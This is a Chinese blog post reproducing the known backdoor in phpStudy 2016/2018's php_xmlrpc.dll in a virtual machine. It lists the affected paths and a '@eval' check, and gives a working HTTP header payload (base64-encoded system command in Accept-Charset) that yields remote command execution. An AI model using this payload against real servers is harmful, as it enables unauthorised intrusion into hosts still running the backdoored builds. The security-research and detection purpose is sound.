phpstudy后门利用复现

最新推荐文章于 2023-07-27 11:03:38 发布
最新推荐文章于 2023-07-27 11:03:38 发布
阅读量796 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41757280/article/details/101438743
版权

0x01.简介

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用。

0x02.漏洞描述

phpstudy近期被爆存在有人恶意植入后门,相关大佬已经被请去喝茶了。

后门存在路径:
phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

安装过phpstudy的小伙伴可以查看一下自己的phpstudy是否存在后门。我这里虚拟机演示

选择php_xmlrpc.dll该文件用记事本打开。查找关键字@eval查看是否存在后门。我这个已经看到存在了。

0x03.漏洞利用

开启phpstudy,

虚拟机当前ip,物理机访问 

poc:

Accept-charset: ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==
Accept-Encoding: gzip,deflate

ZWNobyBzeXN0ZW0oIndob2FtaSIpOw== 为echo system("whoami"); base64编码后内容

burp 抓包,修改请求包内容发送

成功复现 ,触发远程远程命令执行,命令可变,自己编码一下就行了

我是超级无敌大废物
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PhpStudy后门漏洞实战复现
la-大白
10-28 4816
phpstudy后门漏洞
PHPstudy后门利用脚本
01-22
phpstudy PHPstudy后门利用脚本
phpStudy后门利用复现
qq_17754023的博客
12-01 528
1.phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。 2.后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源进行分析,查明了数据回传的信息种类、原理方法、存储位置,并聘请了第三
php study 后门,phpstudy后门利用复现
weixin_29271053的博客
03-10 126
一、漏洞位置程序自带的PHP的php_xmlrpc.dll模块中有隐藏后门,受影响的版本有phpstudy2016(php5.2/5.4)、phpstudy2018(php5.2/5.4)等版本。这里我们用phpstudy2018版本的来验证后门位置及作用。二、步骤Step1:切换php的版本到5.2或者5.4,在phpstudy的根目录下找到phpStudy\PHPTutorial\php\ph...
phpStudy后门漏洞复现
LuckySec
08-20 5703
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节
【渗透测试】phpstudy后门利用复现
SunnyCat
11-03 3539
目录一、漏洞描述二、漏洞影响版本三、漏洞RCE 一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。2018年被爆出存在后门。 漏洞环境自行搭建。 本博客仅学习使用。 二、漏洞影响版本 phpStudy2016 php\php-5.2.17\ext\php_xml
phpstudy后门漏洞复现
m0_46490129的博客
07-27 191
phpstudy后门漏洞复现## 漏洞危害 高危 漏洞描述 攻击者可以利用该漏洞执行php命令,也可以称作phpstudy后门 影响版本 phpstudy 2016版 php-5.4 phpstudy 2018版 php-5.2.17 phpstudy 2018版 php-5.4.45 工具准备 phpsudy2016 -phpstudy2018 brup 漏洞复现 访问phpinfo页面 使用brup 抓住当前页面包 放入 Repeater模块中 利用代码 Accept-charset: c3lzd
Phpstudy后门漏洞复现
qq_56426046的博客
09-10 2256
2019年9月20日,网上传出phpStudy软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。
phpstudy后门利用
weixin_42140534的博客
03-25 832
0x01 漏洞简介 phpstudy是一个对初学php的人们很有帮助的工具,他集成的环境可以给初学者带来很多便捷之处,但是某些版本存在后门,如果服务器使用存在后门phpstudy搭建,这样可以直接被人家getshell 0x02 影响版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 0x03 ...
phpstudy后门检验+复现
weixin_44897902的博客
09-28 325
最近phpstudy被爆出有后门,当时我还毫不在意,觉得自己不可能…然后,打脸 看着自己的phpstudy2018,数据库突然出问题,才发现自己已经成为别人的肉鸡好多年。。。 快来看看你的phpstudy有没有这样的后门吧 准备工作:win10虚拟机,phpstudy20181102,bp抓包工具 找到PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll 记事...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本
01-22
标题 "PHPStudy-BackDoor-EXP PHPstudy后门利用脚本" 涉及到的是一个针对PHPStudy软件的安全问题,即PHPStudy后门利用PHPStudy是一款集成环境的工具,广泛用于PHP开发者的本地开发环境搭建。然而,如同任何其他...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 (4)
02-23
PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本.zip
01-22
标题 "PHPStudy-BackDoor-EXP PHPstudy后门利用脚本.zip" 提示我们关注的是一个与PHPStudy相关的安全问题,具体来说是一个后门利用脚本。PHPStudy是一款广泛使用的PHP开发环境集成软件,它包括PHP、Apache、MySQL等...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 .zip
01-22
压缩包内的文件名“PHPStudy_BackDoor_EXP PHPstudy后门利用脚本 (2).zip”表明这可能是一个关于如何检测、分析或利用PHPStudy后门的工具或教程。这可能包括脚本代码,用于模拟攻击,以便测试系统的防护措施,或者是...
方案-基于云架构的校园信息化建设方案.pdf
最新发布
07-29
方案-基于云架构的校园信息化建设方案.pdf
【创新未发表】Matlab实现蛇群优化算法SO-Kmean-Transformer-LSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现北方苍鹰优化算法NGO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现蝗虫优化算法GOA-Kmean-Transformer-BiLSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值